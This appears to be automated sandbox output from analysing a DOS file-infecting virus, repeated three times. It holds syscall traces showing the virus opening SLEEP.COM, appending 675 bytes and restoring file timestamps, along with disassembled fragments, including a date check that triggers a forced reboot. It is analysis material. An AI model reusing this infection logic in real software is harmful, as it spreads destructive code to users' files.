2018-12-25T11:59:44.441946773Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.449849311Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.453060711Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.45518202Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.457974711Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.46697082Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.470089204Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.478804611Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.489788133Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.493316034Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.50163553Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.509283835Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.511676382Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.523037602Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.530341101Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.534254574Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.541162862Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.544058583Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.55898182Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.56101163Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.569811024Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.580862439Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.584852428Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.592239745Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.602033197Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.604404965Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.610836799Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.616163974Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.619189498Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.621453992Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.62439466Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.637279428Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.639894106Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.641687871Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.646332456Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.649746659Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.658525336Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.665391548Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.668185295Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.679205005Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.690640549Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.694908837Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.696334743Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.699119952Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.709580372Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.711181887Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.716741521Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.724468366Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.72734605Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.731659403Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.73585282Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.737551226Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.744096277Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.74841416Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.752085327Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.75328051Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.755156657Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.761444343Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.763126701Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.771959808Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.789159061Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.791245329Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.796148213Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.801408461Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.802884241Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.804807005Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.808747968Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.810434069Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.811532421Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.813163647Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.381565188Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.383335435Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.39593101Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.397601363Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.401834933Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.41027855Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.418156933Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.434610045Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.443705645Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.44620201Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.463340881Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.483138696Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.485445936Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.486841421Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:44.489170224Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.496504986Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.497721936Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.504310593Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.511865244Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.51488081Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.522917255Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.531211488Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.53426889Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.546493539Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.554841942Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.558290827Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.560431702Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.56384388Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.573595093Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.57502586Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.584109823Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.595624627Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.59890564Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.607057321Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.614893061Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.617279702Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.630919672Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.638779762Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.64206769Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.644274582Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.646945411Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.656287361Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.658098725Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.668664819Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.680065284Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.683757654Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.689138192Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.694898787Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.700618025Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.710594812Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.718564011Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.722053965Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.72537322Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.728488014Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.738245688Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.740757386Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.749395611Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.761310437Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.76516885Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.770925334Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.775252859Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.777345052Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.780332709Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.783505672Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.786223565Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.787572004Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.789525171Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.796507266Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.797951595Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.799394461Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.802394812Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.804897772Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.815595386Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.820026577Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.821949874Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.829010463Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.834278268Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.83743191Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.838665184Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.840558587Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.847063331Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.848200829Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.853410511Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.860432594Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.86241311Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.867142172Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.871787826Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.873380948Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.881389685Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.889002251Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.893883498Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.894905775Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.896768187Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.902414335Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.903637852Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.909097551Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.915858162Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.917759067Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.922748843Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.932204577Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.934123797Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.936761206Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:44.941626023Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:44.943867855Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.944932767Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:44.947368958Z 26 PC: 12c4f | Set disk transfer address (See above)

{"DateBased":true,"Day":1,"Month":1,"Year":1980,"Hour":0,"Min":0,"Second":1,"TimeBased":true,"OriginalID":6496,"SideJobID":0}

.

GIF

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T11:59:44.447750624Z 26 PC: 12c4f | Set disk transfer address
2018-12-25T11:59:44.44936535Z 53 PC: 12a8e | Get interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.452090586Z 37 PC: 12a9e | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:44.45397152Z 71 PC: 12aaa | Get current directory
2018-12-25T11:59:44.458632636Z 78 PC: 12b32 | Find first file
2018-12-25T11:59:44.474146737Z 78 PC: 12b32 | Find first file (See above)
2018-12-25T11:59:44.480966082Z 61 PC: 12c58 | Open file (Filename = 'SLEEP.COM')
2018-12-25T11:59:44.487523083Z 63 PC: 12b4d | Read file or device (Read 26 bytes on handle 5)
2018-12-25T11:59:44.495714935Z 62 PC: 12b51 | Close file
2018-12-25T11:59:44.497890338Z 67 PC: 12c63 | Get or set file attributes
2018-12-25T11:59:44.518167974Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.524048704Z 64 PC: 12c10 | Write file or device (Write 3 bytes on handle 5)
2018-12-25T11:59:44.528505488Z 66 PC: 12c4a | Move file pointer
2018-12-25T11:59:44.529695983Z 44 PC: 12c1b | Get time 0x12c1b: cmp dh, 0
0x12c1e: je 0x12c17
0x12c20: mov byte ptr [bp + 0x3a5], dh
0x12c24: call 0x12c9d
0x12c27: mov ax, 0x5701
0x12c2a: mov cx, word ptr [bp + 0x418]
0x12c2e: mov dx, word ptr [bp + 0x41a]
0x12c32: int 0x21
0x12c34: mov ah, 0x3e
0x12c36: int 0x21
0x12c38: xor cx, cx
0x12c3a: mov cl, byte ptr [bp + 0x417]
0x12c3e: call 0x12c5a
0x12c41: ret
0x12c42: mov ah, 0x42
0x12c44: xor cx, cx
0x12c46: xor dx, dx
0x12c48: int 0x21
0x12c4a: ret
0x12c4b: mov ah, 0x1a
2018-12-25T11:59:44.531689461Z 64 PC: 12cf9 | Write file or device (Write 675 bytes on handle 5)
2018-12-25T11:59:44.538536082Z 87 PC: 12c34 | Get or set file date and time
2018-12-25T11:59:44.540352767Z 62 PC: 12c38 | Close file
2018-12-25T11:59:44.548122497Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.559679191Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.562822317Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.569818502Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.592560002Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.595058142Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.606481383Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.614935167Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.618172522Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.619858414Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.623389105Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.632714465Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.634547549Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.644641426Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.655739508Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.658833921Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.667198093Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.674449707Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.676469821Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.688569961Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.696032831Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.699111158Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.700845208Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.704711452Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.713931817Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.715613301Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.725125374Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.736122529Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.739119448Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.747178139Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.754379448Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.756381419Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.768684687Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.776759071Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.780344725Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.783103341Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.786569403Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.797201355Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.799159529Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.808442235Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.819710947Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.8230606Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.831100545Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.838678572Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.840733314Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.846778658Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.852451269Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.855806442Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.858105214Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.861032581Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.872973937Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.875578019Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.877543199Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.882371138Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.886018871Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.894119034Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.901785519Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.904039286Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.915399035Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.9228295Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:44.926084402Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:44.928528149Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:44.931564076Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:44.941431741Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:44.943863382Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:44.952808445Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.964108011Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:44.967435043Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:44.974697687Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:44.98144065Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:44.984400739Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:44.995242476Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:45.002269363Z 64 PC: 12c10 | Write file or device (See above)
2018-12-25T11:59:45.006102098Z 66 PC: 12c4a | Move file pointer (See above)
2018-12-25T11:59:45.008034373Z 44 PC: 12c1b | Get time (See above)
2018-12-25T11:59:45.0113717Z 64 PC: 12cf9 | Write file or device (See above)
2018-12-25T11:59:45.028279615Z 87 PC: 12c34 | Get or set file date and time (See above)
2018-12-25T11:59:45.031097223Z 62 PC: 12c38 | Close file (See above)
2018-12-25T11:59:45.040182762Z 67 PC: 12c63 | Get or set file attributes (See above)
2018-12-25T11:59:45.051621548Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:45.055542928Z 61 PC: 12c58 | Open file (See above)
2018-12-25T11:59:45.06348726Z 63 PC: 12b4d | Read file or device (See above)
2018-12-25T11:59:45.076325792Z 62 PC: 12b51 | Close file (See above)
2018-12-25T11:59:45.079832357Z 79 PC: 12b32 | Find next file (See above)
2018-12-25T11:59:45.083028384Z 59 PC: 12ac0 | Change current directory
2018-12-25T11:59:45.088009733Z 42 PC: 12ac6 | Get date 0x12ac6: cmp al, 4
0x12ac8: jne 0x12ae0
0x12aca: cmp dh, 0xe
0x12acd: ja 0x12ae0
0x12acf: mov ax, 0x40
0x12ad2: mov ds, ax
0x12ad4: mov word ptr [0x72], 0
0x12ada: ljmp 0xffff:0
0x12adf: retf
0x12ae0: mov ax, 0x2524
0x12ae3: lds dx, ptr [bp + 0x446]
0x12ae7: int 0x21
0x12ae9: push cs
0x12aea: pop ds
0x12aeb: lea dx, word ptr [bp + 0x3c2]
0x12aef: mov ah, 0x3b
0x12af1: int 0x21
0x12af3: mov dx, 0x80
0x12af6: call 0x12c4b
0x12af9: cmp sp, 0x4b50
2018-12-25T11:59:45.092764914Z 37 PC: 12ae9 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T11:59:45.094512562Z 59 PC: 12af3 | Change current directory
2018-12-25T11:59:45.096667702Z 26 PC: 12c4f | Set disk transfer address (See above)